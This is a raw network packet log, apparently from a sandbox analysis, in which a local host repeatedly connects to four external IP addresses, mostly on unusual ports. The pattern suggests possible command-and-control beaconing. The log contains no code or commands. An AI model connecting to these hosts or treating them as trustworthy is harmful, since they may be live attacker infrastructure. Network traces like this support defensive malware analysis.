Oct 28, 2021 05:26:41.218044996 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.218085051 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.225667953 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.313646078 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.340291023 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:41.390422106 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.473093987 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.473313093 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.474075079 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.506697893 CEST	6891	49800	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:41.506855965 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:41.507597923 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:41.633519888 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.633636951 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.633722067 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.634428024 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.640101910 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.640208960 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:41.674420118 CEST	6891	49800	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:41.674479961 CEST	6891	49800	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:41.674627066 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:41.675170898 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:41.678950071 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:41.679027081 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:41.793838024 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.799746990 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.799772024 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.799778938 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.799789906 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.845305920 CEST	6891	49800	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:41.845319986 CEST	6891	49800	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.177721024 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:42.177742004 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:42.177817106 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:42.181219101 CEST	49799	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:42.229130030 CEST	6891	49800	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.229155064 CEST	6891	49800	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.229315996 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.237423897 CEST	49800	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.293843031 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.340718985 CEST	808	49799	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:42.356594086 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.403486967 CEST	6891	49800	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.410536051 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.410653114 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.411222935 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.460017920 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.460143089 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.460683107 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.464854002 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.465006113 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.465061903 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.465600967 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.470242977 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.470360041 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.524012089 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.524030924 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.524693966 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.626630068 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.626686096 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.626755953 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.627258062 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.630796909 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.630912066 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:42.709193945 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.709239006 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.709419966 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.716800928 CEST	49802	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:42.771164894 CEST	8116	49802	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:42.796858072 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.796902895 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.796917915 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:42.844749928 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:42.844794035 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:42.844908953 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:42.845639944 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:42.845659018 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:43.192307949 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:43.192357063 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:43.192492008 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:43.192560911 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:43.196038008 CEST	49801	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:43.316814899 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.362054110 CEST	6891	49801	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:43.364624023 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.364768028 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.365446091 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.368043900 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:43.368187904 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:43.368910074 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:43.368923903 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:43.379209042 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:43.379226923 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:43.379395008 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:43.379405022 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:43.414211035 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.414256096 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.414367914 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.414926052 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.420025110 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.420154095 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.467735052 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.468008995 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.504929066 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.637128115 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.637149096 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.637375116 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.642822981 CEST	49804	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:43.690356016 CEST	8116	49804	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:43.766402960 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:43.766470909 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:43.766571999 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:43.767379045 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:43.767395973 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.111350060 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.111413956 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.111433029 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.111479998 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.119162083 CEST	49803	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.119189024 CEST	443	49803	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.273466110 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.273600101 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.277972937 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.277982950 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.284704924 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.284713984 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.284866095 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.284877062 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.286360025 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:44.448321104 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:44.448517084 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:44.449826956 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:44.611468077 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:44.611819029 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:44.611901045 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:44.612356901 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:44.616467953 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:44.616553068 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:44.775979042 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:44.778424025 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:44.778444052 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:44.778450966 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:44.980876923 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.980964899 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:44.981034040 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.981132030 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.987992048 CEST	49805	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:44.988024950 CEST	443	49805	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:45.151716948 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.167732954 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.167767048 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.167841911 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.173782110 CEST	49806	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.294877052 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:45.321934938 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.322035074 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.322818995 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.335493088 CEST	808	49806	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.460933924 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:45.461129904 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:45.462340117 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:45.492922068 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.493256092 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.493318081 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.493747950 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.497214079 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.497345924 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:45.628392935 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:45.628439903 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:45.628593922 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:45.629110098 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:45.634403944 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:45.634500980 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:45.663825035 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.667329073 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.667361975 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.667402983 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:45.800837994 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:45.800873995 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.059520960 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:46.059565067 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:46.059698105 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:46.062589884 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:46.188873053 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.198925018 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.198957920 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.199007034 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.199034929 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.206711054 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.232868910 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:46.342225075 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.354995966 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.355119944 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.356000900 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.372684002 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.396389008 CEST	8116	49810	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:46.396585941 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.397562027 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.451385021 CEST	8116	49810	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:46.451545954 CEST	8116	49810	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:46.451639891 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.452359915 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.459543943 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.459666967 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.513577938 CEST	8116	49810	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:46.513601065 CEST	8116	49810	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:46.522066116 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.522171974 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.522347927 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.523014069 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.527967930 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.528074026 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:46.694099903 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.694127083 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.694134951 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:46.698906898 CEST	8116	49810	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:46.698921919 CEST	8116	49810	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:46.699055910 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.709331036 CEST	49810	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:46.763361931 CEST	8116	49810	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:46.832232952 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:46.832278013 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:46.832361937 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:46.832969904 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:46.832983017 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:47.071877956 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:47.071898937 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:47.072062969 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:47.072118998 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:47.075320959 CEST	49809	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:47.202476025 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.241386890 CEST	6891	49809	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:47.254853010 CEST	8116	49812	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:47.255019903 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.255757093 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.307612896 CEST	8116	49812	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:47.307734013 CEST	8116	49812	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:47.307809114 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.308418989 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.313491106 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.313627005 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.319222927 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:47.319330931 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:47.319999933 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:47.320013046 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:47.326299906 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:47.326318026 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:47.326438904 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:47.326448917 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:47.365586042 CEST	8116	49812	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:47.365608931 CEST	8116	49812	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:47.555758953 CEST	8116	49812	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:47.555773973 CEST	8116	49812	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:47.555866003 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.555902004 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.558737993 CEST	49812	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:47.610723972 CEST	8116	49812	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:47.683803082 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:47.683846951 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:47.683969975 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:47.684607029 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:47.684617043 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.011970043 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.012061119 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.012077093 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.012118101 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.020948887 CEST	49811	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.020971060 CEST	443	49811	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.141185045 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:48.210254908 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.210416079 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.211201906 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.211215019 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.217904091 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.217916012 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.218118906 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.218132019 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.306525946 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:48.307986975 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:48.308689117 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:48.473809004 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:48.474001884 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:48.474129915 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:48.474611044 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:48.479742050 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:48.479862928 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:48.639821053 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:48.644944906 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:48.645137072 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:48.645162106 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:48.933974028 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.934043884 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:48.934165001 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.937165976 CEST	49813	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:48.937186956 CEST	443	49813	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:49.035473108 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.035490036 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.035671949 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.042999983 CEST	49814	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.062978983 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.153326035 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:49.208481073 CEST	808	49814	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.226373911 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.226490021 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.227467060 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.319489956 CEST	6891	49816	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:49.319704056 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:49.320552111 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:49.390685081 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.390876055 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.390986919 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.391551971 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.396454096 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.396588087 CEST	49815	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:49.486506939 CEST	6891	49816	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:49.486645937 CEST	6891	49816	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:49.486764908 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:49.487339973 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:49.492322922 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:49.492460012 CEST	49816	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:49.554524899 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.559484959 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.559528112 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.559537888 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.559552908 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.658324003 CEST	6891	49816	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:49.658421040 CEST	6891	49816	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:49.943130970 CEST	808	49815	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:49.943164110 CEST	808	49815	143.244.140.214	192.168.2.3
